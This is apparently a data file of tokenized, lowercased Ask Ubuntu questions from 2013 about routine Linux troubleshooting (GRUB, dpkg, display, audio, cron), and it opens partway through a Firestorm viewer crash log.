2013-06-02t00:01:52z < mem > hugepagesize : 2048 2013-06-02t00:01:52z < mem > inactive : 1048316 2013-06-02t00:01:52z < mem > inactive ( anon ) : 173972 2013-06-02t00:01:52z < mem > inactive ( file ) : 874344 2013-06-02t00:01:52z < mem > kernelstack : 3528 2013-06-02t00:01:52z < mem > mapped : 198772 2013-06-02t00:01:52z < mem > memfree : 5490356 2013-06-02t00:01:52z < mem > memtotal : 8044116 2013-06-02t00:01:52z < mem > mlocked : 44 2013-06-02t00:01:52z < mem > nfs_unstable : 0 2013-06-02t00:01:52z < mem > pagetables : 33116 2013-06-02t00:01:52z < mem > sreclaimable : 96436 2013-06-02t00:01:52z < mem > sunreclaim : 29248 2013-06-02t00:01:52z < mem > shmem : 174988 2013-06-02t00:01:52z < mem > slab : 125684 2013-06-02t00:01:52z < mem > swapcached : 0 2013-06-02t00:01:52z < mem > swapfree : 1952764 2013-06-02t00:01:52z < mem > swaptotal : 1952764 2013-06-02t00:01:52z < mem > unevictable : 44 2013-06-02t00:01:52z < mem > vmallocused : 834388 2013-06-02t00:01:52z < mem > writeback : 0 2013-06-02t00:01:52z < mem > writebacktmp : 0 2013-06-02t00:01:52z < mem > timestamp : 2013-06-02t00:01:51.11z total pages : 1 unused pages : 1 total bytes : 1.00 used : 0.00 ( 0.00 % ) unused : 1.00 page usage ( page # / % free ) : 0/100.0 small allocations ( size/ # / % ) : t/s ( % s ) 0/0 ( -nan ) 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 3656 ) : writesysteminfo : os : linux 3.5 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 3657 ) : writesysteminfo : os info : linux 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 3537 ) : writedebuginfo : opening debug file /home/deus/.firestorm/logs/debug_info.log 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 956 ) : init : j2c engine is : kdu v7.1 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 957 ) : init : libcurl version is : libcurl/7.21.1 openssl/1.0.0d zlib/1.2.5 c-ares/1.7.1 2013-06-02t00:01:52z warning : llxml/llcontrol.cpp ( 939 ) : llcontrolgroup : :loadfromfile : can not find file /home/deus/.firestorm/user_settings/settings_crash_behavior.xml to load . 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 999 ) : init : ui initialization is done . 2013-06-02t00:01:52z info : newview/llappviewerlinux_api_dbus.cpp ( 72 ) : grab_dbus_syms : found dso : libdbus-glib-1.so.2 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 1048 ) : init : hardware test initialization done . 2013-06-02t00:01:52z info : newview/lltexturecache.cpp ( 973 ) : initcache : headers : 377119 textures size : 1422 mb 2013-06-02t00:01:52z info : newview/lltexturecache.cpp ( 1586 ) : purgetextures : texture cache : purging . 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 4346 ) : initcache : vfs cache size : 409 mb 2013-06-02t00:01:52z info : llvfs/llvfs.cpp ( 251 ) : llvfs : attempting to open vfs index file /home/deus/.firestorm/cache/index.db2.x.1 2013-06-02t00:01:52z info : llvfs/llvfs.cpp ( 252 ) : llvfs : attempting to open vfs data file /home/deus/.firestorm/cache/data.db2.x.1 2013-06-02t00:01:52z info : llvfs/llvfs.cpp ( 555 ) : llvfs : using vfs index file /home/deus/.firestorm/cache/index.db2.x.1 2013-06-02t00:01:52z info : llvfs/llvfs.cpp ( 556 ) : llvfs : using vfs data file /home/deus/.firestorm/cache/data.db2.x.1 2013-06-02t00:01:52z info : llvfs/llvfs.cpp ( 251 ) : llvfs : attempting to open vfs index file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/static_index.db2 2013-06-02t00:01:52z info : llvfs/llvfs.cpp ( 252 ) : llvfs : attempting to open vfs data file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/static_data.db2 2013-06-02t00:01:52z info : llvfs/llvfs.cpp ( 555 ) : llvfs : using vfs index file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/static_index.db2 2013-06-02t00:01:52z info : llvfs/llvfs.cpp ( 556 ) : llvfs : using vfs data file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/static_data.db2 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 1069 ) : init : cache initialization is done . 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 3424 ) : initwindow : initializing window ... 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 114 ) : ll_try_gtk_init : starting gtk initialization . 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 134 ) : ll_try_gtk_init : gtk initialized . 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 135 ) : ll_try_gtk_init : - compiled against gtk version 2.4.14 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 139 ) : ll_try_gtk_init : - running against gtk version 2.24.10 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 155 ) : ll_try_gtk_init : - gtk version is good . 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 426 ) : createcontext : createcontext , fullscreen=0 size=1024x738 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 442 ) : createcontext : compiled against sdl 1.2.14 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 448 ) : createcontext : running against sdl 1.2.14 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 473 ) : createcontext : original aspect ratio was 1920:1080=1.78 2013-06-02t00:01:52z info : llwindow/llwindowsdl.cpp ( 636 ) : createcontext : createcontext : creating window 1024x738x32 the program 'do-not-directly-run-firestorm-bin ' received an x window system error . this probably reflects a bug in the program . the error was 'badrequest ( invalid request code or no such operation ) ' . ( details : serial 13 error_code 1 request_code 154 minor_code 19 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) *** bad shutdown ( $ ll_run_err ) . *** error : ld.so : object '/home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/lib/libcrypto.so.1.0.0 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/lib/libssl.so.1.0.0 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/lib/libcrypto.so.1.0.0 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/lib/libssl.so.1.0.0 ' from ld_preload can not be preloaded : ignored . you are running the firestorm viewer on a x86_64 platform . the most common problems when launching the viewer ( particularly 'bin/do-not-directly-run-firestorm-bin : not found ' and 'error while loading shared libraries ' ) may be solved by installing your linux distribution 's 32-bit compatibility packages . for example , on ubuntu and other debian-based linuxes you might run : $ sudo apt-get install ia32-libs ia32-libs-gtk ia32-libs-kde ia32-libs-sdl deus @ work : ~/programs/phoenix_firestorm-release_i686_4.4.0.33720 $
303026	no steam powered icon	i installed steam using wine recently because of some steam games not working . when i installed it using steaminstall.msi with winetricks and wine it did give me an icon but it says this details : failed to execute child process `` /usr/bin/steam '' ( no such file or directory ) . any ideas on how to fix this ?
303027	how to see the amount of free disk space in files browser with 13.04 ( raring ringtail )	up to the previous ubuntu versions you could easily switch on a status line at the bottom of the files browser , which showed useful infos like the amount of free disk space , number of files in directory , number of selected files and amount of data of selected files . how do i get these informations with raring ringtail ? sigh imagine you want to copy a 5 gb file to a usb drive or memory stick and the computer just says `` not enough free space '' - how should you know whether you have to delete just a few mb to make it fit or wheter the device is full ? and when you multi-select files to copy or delete , do you then have to calculate by yourself ? soemtimes i really wonder how others are using their computer when a feature is removed that seems to be totally essential . maybe they have tons of terabytes of hard disk drives and a couple of 64+ gb flash memory sticks so they never run out of free space .
303032	ubuntu on macbookpro 9,2 install issues	is it not possible at all to install ubuntu just with a live cd ? do i need to install it with a live usb ? at first hand i installed refit which enables to see the ubuntu live cd but when chosen to boot from it , just black screen with blinking cursor . fn+f6 did nothing for me . saw on some documentations installing refind and changing screen configurations on machd . well , the screen configs have to be built from start , is that it ? none of the documents for screen boot in efi already exists on mac system , so i need to create it from scratch , is that really it ? i’ve downloaded isos - 12.04 amd64 , 12.10 amd64 and 13.04 i386 . see the point here is , latest macbook pro versions are intel based , so i’m in doubt if amd64 is really the best iso for it . just to mention , none of the three above downloaded boots to a grub or to a install “try ubuntu” screen . all 3 just boots to a black screen with blinking cursor and after a while , just black screen , again , hitting c or option-alt or fn+f6 did nothing . for starters , to see which model i had , none of the documentation where true . the steps that worked out for me were sudo su admin pass sysctl hw.model that gave me the answer : macbookpro9,2 in my “about this mac” the answer is 10.8.3 , 13-inch , mid 2012 , processor 2.5 ghz intel core i5 , memory 4 gb 1600 mhz ddr3 , graphics intel hd graphics 4000 512 mb , software os x 10.8.3 ( 12d78 ) . thanks for the patience . building a document in portuguese compiling the research , can be seen here https : //docs.google.com/document/d/15237vio3_drnecg-wujm-oz_y5rfmkxgn00g_2uusuu/edit ps just for stating , partitions are like this right now * report for internal hard disk * current gpt partition table : # start lba end lba type 1 40 409639 efi system ( fat ) 2 409640 787271607 mac os x hfs+ 3 787271608 788541143 mac os x boot 4 856410112 976773119 basic data current mbr partition table : # a start lba end lba type 1 1 409639 ee efi protective 2 409640 787271607 af mac os x hfs+ 3 787271608 788541143 ab mac os x boot 4 * 856410112 976773119 0c fat32 ( lba ) mbr contents : boot code : unknown , but bootable partition at lba 40 : boot code : none ( non-system disk message ) file system : fat32 listed in gpt as partition 1 , type efi system ( fat ) partition at lba 409640 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 2 , type mac os x hfs+ listed in mbr as partition 2 , type af mac os x hfs+ partition at lba 787271608 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 3 , type mac os x boot listed in mbr as partition 3 , type ab mac os x boot partition at lba 856410112 : boot code : none ( non-system disk message ) file system : fat32 listed in gpt as partition 4 , type basic data listed in mbr as partition 4 , type 0c fat32 ( lba ) , active
303033	changing the torrent programm for magnet url	for the moment i 'm downloading torrents via magnet sing transmission , when the first time i was asked by chromium to open the magnet url , i choosed transmission and i checked the remember my choice for all links of this type . now i want to change the default torrent program for magnet url i want to open them using ktorrent . how can i do that ?
303038	i encountered a dpkg dependency issue , and how do i resolve this issue ?	sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . 10 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up initramfs-tools ( 0.103ubuntu0.7 ) ... update-initramfs : deferring update ( trigger activated ) lzma : ( stdout ) : write error : no space left on device dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of linux-image-3.8.0-19-generic : linux-image-3.8.0-19-generic depends on initramfs-tools ( > = 0.36ubuntu6 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing linux-image-3.8.0-19-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-3.8.0-23-generic : linux-image-3.8.0-23-generic depends on initramfs-tools ( > = 0.36ubuntu6 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing linux-image-3.8.0-23-generic ( -- configure ) : dependency problems - leaving unconfigured setting up plymouth-theme-ubuntu-text ( 0.8.8-0ubuntu6.1 ) ... no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . update-initramfs : deferring update ( trigger activated ) lzma : ( stdout ) : write error : no space left on device dpkg : error processing plymouth-theme-ubuntu-text ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-23-generic : linux-image-extra-3.8.0-23-generic depends on linux-image-3.8.0-23-generic ; however : package linux-image-3.8.0-23-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-23-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.8.0-23-generic ; however : package linux-image-3.8.0-23-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.8.0-23-generic ; however : package linux-image-extra-3.8.0-23-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.23.39 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-19-generic : linux-image-extra-3.8.0-19-generic depends on linux-image-3.8.0-19-generic ; however : package linux-image-3.8.0-19-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-19-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up plymouth-theme-ubuntu-logo ( 0.8.8-0ubuntu6.1 ) ... update-initramfs : deferring update ( trigger activated ) lzma : ( stdout ) : write error : no space left on device dpkg : error processing plymouth-theme-ubuntu-logo ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of casper : casper depends on initramfs-tools ( > = 0.92bubuntu55 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing casper ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : initramfs-tools linux-image-3.8.0-19-generic linux-image-3.8.0-23-generic plymouth-theme-ubuntu-text linux-image-extra-3.8.0-23-generic linux-image-generic linux-generic linux-image-extra-3.8.0-19-generic plymouth-theme-ubuntu-logo casper e : sub-process /usr/bin/dpkg returned an error code ( 1 )
303045	grub error , no such device	i installed a new motherboard and processor combo tonight and can not fix grub . i tried auto grub reinstall in the ubuntu installer rescue system . nothing . i tried several of the guides around the web all relating to a live cli and installing grub . i have tried several times and no luck . i get a sucesfull install to sda . minus the sector 32 flexnet error . when i try to boot i get error : no such device : ( uuid that dosent match ) and then i am at grub rescue . i have 5 drives , all installed in the same order in the bios . 4 of them are linux lvm . if i try to boot from one of them i get a nice error message warning me . so i know i am booting to the right device . i just cant get it to let go of the old uuid and find a new one . i tried : sudo grub-install -- recheck /dev/sda sudo grub-install -- root-directory=/ /dev/sda i tried several times , several ways . i have 12.10 this morning i found that even deleting the grub.cfg and running grub-update still pulls the same uuid 's . where are these bring pulled from and how do i update there . further confused . the uuid 's in grub.cfg are all right . the one that is coming up at the boot error does not match any of the drives and does not match the ones in the grub.cfg
303047	unity panel disappeared after losing my home folder	i had my home folder on it 's own virtual disk that got corrupted and i lost the data on it . i was able to recreate my home folder in the same place , but now when i log into ubuntu i get an empty screen and then i have to run ctrl-alt-t to get a terminal and then unity -- reset to get the unity panel back and then all is well . how can i fix things so i get the panel when i log in ? i 'm running 12.04
303050	how to compile & install compiz blur plugin in ubuntu 13.04 ?	can i get this plug-in working on ubuntu 13.04 ? http : //wiki.compiz.org/plugins/blur thanks !
303051	how can i use an ati radeon hd 6450 on ubuntu 13.04 ?	basically , i get a orange/purple/black flickering screen when i try to boot ubuntu 13.04 with my amd radeon hd 6450 without the proprietary drivers , but can not install the driver from the website without having the graphics card installed . how , then , could i use my graphics card and install the drivers , despite the flickering screen ? p.s . i tried to go into tty , that only gave me a blank screen .
303053	ubuntu 12.04 lts on a lenovo ideapad s405	i installed ubuntu on an s405 ideapad after disabling uefi boot and enabling legacy support . the most important problem is that while i get about 3-4 hours battery backup on windows , ubuntu tells me immediately after unplugging from the power supply that there is something wrong with the battery and puts the laptop in hibernate mode . it does not allow me to disable this . in addition , the s405 has a weird fn key that has to be pressed along with the function keys to make the function keys work , otherwise just pressing the function keys will run some functions like muting/increasin or decreasing volume/brightness etc . there is supposed to be an option in the bios to change this , according to the documentation , but its not there in my laptop . is there anyway in ubuntu that i can change these mapping ?
303058	assert failed in install ubuntu touch for tablet nexus 7 ( 32g )	as an end user to test ubunbu touch on nexus 7 ( 32g gsm/hspa+ ) , encountered a big problem which is error `` status 7 '' or `` assert failed '' when manual installing raring-preinstalled-armel+grouper.zip . pls kindly check the oboved zip file is appropriate for tablet nexus 7 ( 32g gsm/hspa+ ) .
303062	ubuntu 12.10 no usb sound output for audiolab q-dac	recently i upgraded my sound system from using mobo 's internal audio output to usb2.0 by connecting to a usb dac ( audiolab q-dac ) . the first time connecting the ubuntu 12.10 to usb dac was successful , but after a system upgrade ( apt-get update & upgrade ) . no sound output at all . i can still choose the usb stereo output option in pulseaudio control panel , but no sound output . it seems that the connection has been automatically muted . how can i un-mute it ? same problem exists even though i upgraded to 13.04 . i have dumped the output of the command lspci as follows : 00:00.0 host bridge : intel corporation xeon e3-1200 v2/ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579v gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.4 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 5 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1c.7 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 8 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation z77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series/c210 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 03:00.0 ethernet controller : intel corporation 82574l gigabit network connection 04:00.0 pci bridge : plx technology , inc. pex 8606 6 lane , 6 port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 05:01.0 pci bridge : plx technology , inc. pex 8606 6 lane , 6 port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 05:04.0 pci bridge : plx technology , inc. pex 8606 6 lane , 6 port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 05:05.0 pci bridge : plx technology , inc. pex 8606 6 lane , 6 port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 05:07.0 pci bridge : plx technology , inc. pex 8606 6 lane , 6 port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 05:09.0 pci bridge : plx technology , inc. pex 8606 6 lane , 6 port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 07:00.0 sata controller : marvell technology group ltd. 88se9172 sata 6gb/s controller ( rev 11 ) 0a:00.0 pci bridge : integrated technology express , inc. device 8892 ( rev 30 ) 0b:02.0 firewire ( ieee 1394 ) : texas instruments tsb43ab22a ieee-1394a-2000 controller ( phy/link ) [ iohci-lynx ] 0c:00.0 sata controller : marvell technology group ltd. 88se9172 sata 6gb/s controller ( rev 11 ) this output dump seems there 's no connection with the usb dac even though i had connected the usb device before the dumping of lspci . why ? regards , gordon
303068	error with tar command , can not install xampp 1.8.1 on ubuntu 13.04	i am trying to install xammpp on my ubuntu 13.04 . what i did was downloaded xampp from sourceforge , and then in the terminal i created /opt directory like this : mkdir /opt sudo tar xvfz xampp-linux-1.8.1.tar.gz -c/opt and this error shows up : tar ( child ) : xampp-linux-1.8.1.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now
303072	xrandr : screen can not be larger than 1680x1680 ( desired size 3360x1050 )	when executing this list of commands : xrandr -- output dfp3 -- mode 1680x1050 -- rate 60 xrandr -- output crt1 -- mode 1680x1050 -- rate 59 xrandr -- output dfp3 -- left-of crt1 ( error here ) xrandr -- output crt1 -- primary i have this output : xrandr : screen can not be larger than 1680x1680 ( desired size 3360x1050 ) i looked up and they recommended me to add a line in xorg.conf adding virtual 3360x1050 to the display subsection . i added it and made a reboot but i have the same error . here is my xorg.conf : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' virtual 3360 1050 viewport 0 0 depth 24 endsubsection endsection
303081	install older kernel version	i 'm using ubuntu 13.04 and the kernel version is 3.8.0 . unfortunately , i need a driver which can not be compiled and installed in 3.8.0 . as a result , i want to install older version ( 2.6.35 ) and i want to switch between them when i need to use the driver . is it possible ? how to do so ?
303083	does the ubuntu 13.04 disk image fit on a cd ?	i am currently out of blank dvd 's so my question is : can i burn the iso to a cd instead or does it have to be a dvd ?
303088	screen brightness reduction software ?	i 'm a total new user of ubuntu . i use ubuntu 12.04 and my laptop is dell studio 1558. the problem is the , the minimum brightness in my laptop is still pretty bright when using the computer in dark situation . now i 've tried tints , but i want a software that actually reduces the screen brightness . there 's this app called 'dimmer ' for windows which was perfect for me . but i do n't seem to find its linux alternative . any suggestion ?
303091	convert fat32 partition to ntfs without data loss	is there a way to change the partition format from fat32 to ntfs without losing data in it ? for now i am aware of one method : split partition in two , set the new partition format to ntfs , copy data to it , then delete the old partition and add its space to the new one . one fault with this method is simple : it ca n't be done if more than a half of the current partition is already used . so i 'm looking for a solution that would n't delete my data , and just change the partition format from fat32 to ntfs . is something like that possible or not ?
303092	when i play music on my ubuntu 13.04 dell xps 13 fhd laptop the sound plays through the headphones and speakers at the same time	i tried the settings mention in this topic : headphone jack not working ? but with no luck . the first thing i tried was to edit analog-output-headphones.conf but when i did that , i could no longer play from the laptop 's speakers but only from headphones . then i tried the second suggestion of editing /etc/modprobe.d/alsa-base.conf which prevents the soundcard from loading first - in that case the sound keeps coming from both headphones and speakers . any idea would be appreciated .
303103	how to remove windows	i want to remove windows and delete it 's partition . also i want to enlarge the linux partition to fill up the free 'd up space . can anyone explain me how to do that ? i installed it via windows using wubi . it is installed in a folder on a different partition than windows .
303105	how to login as super user ?	i use the ubuntu 12.04tls and i believe i am the admin user . however when i create a file ( for example using editor like sublime text2 ) and save it in my var/www/ folder , it always pop unable to save /var/www/filename . it is so annoying that i have to create the file somewhere first ( for example dektop ) and use terminal , login as su and mv filename to /var/www/ directory . i believe this is a permission issue . how do i resolve this ? thanks .
303106	terminal locked with matlab installation	i was trying to install matlab couple of days ago but the process stuck due to the malfunction of the iso file . now i can not stop this installation because it prevents me to get update or upgrade . this is the error i get when i try to install smth from the terminal : ubuntu @ ubuntu-inspiron-n5010 : ~ $ sudo apt-get upgrade [ sudo ] password for ubuntu : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? thank you in advance
303109	usb 3.0 ports not working after suspend	i have a samsung series 9 np900x4c ultrabook , and since i upgraded to 12.10 and then 13.04 , my usb 3.0 ports ( two on the right side ) do n't work anymore after my computer wakes up from suspend mode . i need to restart my computer to get these two usb 3.0 ports working again . my usb 2.0 port ( one on the left side ) does n't encounter this issue . how do i fix this ? $ cat /sys/bus/usb/devices/*/power/level on auto auto auto auto auto
303113	problem running a script after resume	i am trying to run a script after resuming from suspend . i need this script to disable the right click in the touchpad and to fix a problem of my wifi . accordingly to how to run script after resume and after unlocking screen i placed a script called autorun.sh in /etc/pm/sleep.d : # ! /bin/bash case `` $ 1 '' in hibernate|suspend ) sudo -u giorgio env display=:0 zenity -- info synclient tapbutton2=0 sudo -u giorgio env display=:0 zenity -- info modprobe iwlagn 11n_disable=1 exit ; ; thaw|resume ) sudo -u giorgio env display=:0 zenity -- info synclient tapbutton2=0 sudo -u giorgio env display=:0 zenity -- info modprobe iwlagn 11n_disable=1 exit ; ; esac exit the problem is that when i resume , i realize that the script did n't actually work ( the right click is not disabled ) and in the log file /var/log/pm-suspend.log i have this lines : running hook /etc/pm/sleep.d/autorun.sh resume suspend : ( process:15304 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . ( process:15310 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . what i am missing ? thanks in advance .
303120	how folders created in /var/run on each reboot	in recent ubuntus ( specifically , what interests me the most is 12.04 ) /var/run is tmpfs , and thus i assume it starts empty with each reboot . yet , i see there some folders , like /var/run/mysqld and numerous others . how those folders created on each reboot ? is there some template folder which copied to /var/run/ ( and if so , which script does that ) , or each folder mkdir'ed separately , or what ? edit : please , do not answer that /var/run is persistent , or that /run is persistent . because it is not . even if it is so on your system , it is not so on a regular 12.04 .
303121	can not install skype	sudo dpkg - skype-ubuntu*.deb [ sudo ] password for user : dpkg : error : need an action option type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! i got this output when try to install skype on ubuntu 13.04 .
303127	flag scripts in ubuntu	is there a way to create flag scripts in ubuntu that go off when a particular command is executed in the terminal , like for example when i execute sudo ifconfig wlan0 down another script would get executed . how can i accomplish this ?
303129	uefi install only boots if selected from bios	i have recently reinstalled ubuntu , and now i encounter some issues which seem to be uefi related . i have tried searching for similar problems , but found no solutions and only one with the same problem , but the topic had no answers.. system asus ux32vd , intel based system with hd4000 + nvidia graphics . problem the system seems to freeze at `` loading inital ramdisk '' . it happens both in normal booth ( removing quiet splash ) and when trying recovery mode . hence , nomodeset does n't solve the problem . how to reproduce right after reinstallation the system boots fine all the time . but when i run apt-get upgrade it will fail to boot on the next boot , in both normal and recovery mode . i have resinstalled the system several times , and the same behaviour appears after the upgrade . workaround the curious thing is that if i enter the system setup ( uefi/bios-screen ) , and then select the ubuntu uefi boot option , the system boots every time . but if i let the system boot normally , it wo n't boot . the option i select manually is the same option as the one to boot automatically . naturally , i would like to not have to enter the setup every time i use my system . any idea what could be wrong ?
303133	issues about insalling cinelerra video editor ?	in order to install cinerella i typed in terminal : sudo add-apt-repository ppa : cinelerra-ppa/ppa sudo apt-get update sudo apt-get install cinelerra but after last command typed , my computer gives me an error below ? reading package lists ... done building dependency tree reading state information ... done package cinelerra is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'cinelerra ' has no installation candidate what should i do ( i 'm using ubuntu 12.04 lts )
303138	how to rebuild okular with latest poppler library ?	i am running ubuntu 12.04 okular : 0.14.3 using poppler library -v 0.18.4 i want to export annotations to pdfs and am trying solution given here i have compiled the tarball of poppler -v 0.22.4 from here my question is how to rebuild okular using the library package . i have installed it in /usr/local/src folder . thank you in advance
303141	is there an alternative to the skype service ?	on ubuntu 13.04 skype segfaults constantly ( i 've read a couple of threads about fixing the issue and it is kind of works now expect it segfaults every time chat message comes in ) so i 'm thinking it is time to find it a replacement . which one should i choose ? ok , i 've seen previous post , yet only one answer in it highlights some alternatives . also i want no the alternative skype client , but the whole ecosystem . the one alternative presented oovoo does not support linux and other goober shows unresolved dependency : libglew1.5
303147	updated to ubuntu 13.04 , 3 finger gestures are gone	before gnome3 , ubuntu emulated middle click with 3 fingers tap on the touchpad . after gnome3 , it was used to drag windows ( and maximize/restore ) . i missed the very useful middle click gesture , but at least i had something in return . now i just upgraded to 13.04 , and i have neither . ok , just noticed , now that i have more than one window open , it 's the same as alt+tab ( once ) . so i can just alternate between two windows . is there any way to have either of the old behaviors ? ideally the middle click simulation ? i consider that one to be the ultimate feature for the 3 finger touchpad gesture , as most laptops only have two physical buttons . thank you
303148	why anacron does not call the crontab user files ?	i want a special command to be lauched everyday , but dont want to put it in the /etc/cron.d/ because its a user specific user ! pg @ pipotower : ~ $ crontab -l # m h dom mon dow command 0 0 * * * updatedb -l 0 -o ~/.externalharddisk.db -u /var/autofs/removable/usbdata the crontab -e command which puts the file in /var/spool/cron/crontabs/username but dont know why its not called by anacron ... . usr @ tower : ~/ $ cat /etc/anacrontab # /etc/anacrontab : configuration file for anacron # see anacron ( 8 ) and anacrontab ( 5 ) for details . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin home=/root logname=root # these replace cron 's entries 1 5 cron.daily run-parts -- report /etc/cron.daily 7 10 cron.weekly run-parts -- report /etc/cron.weekly @ monthly 15 cron.monthly run-parts -- report /etc/cron.monthly
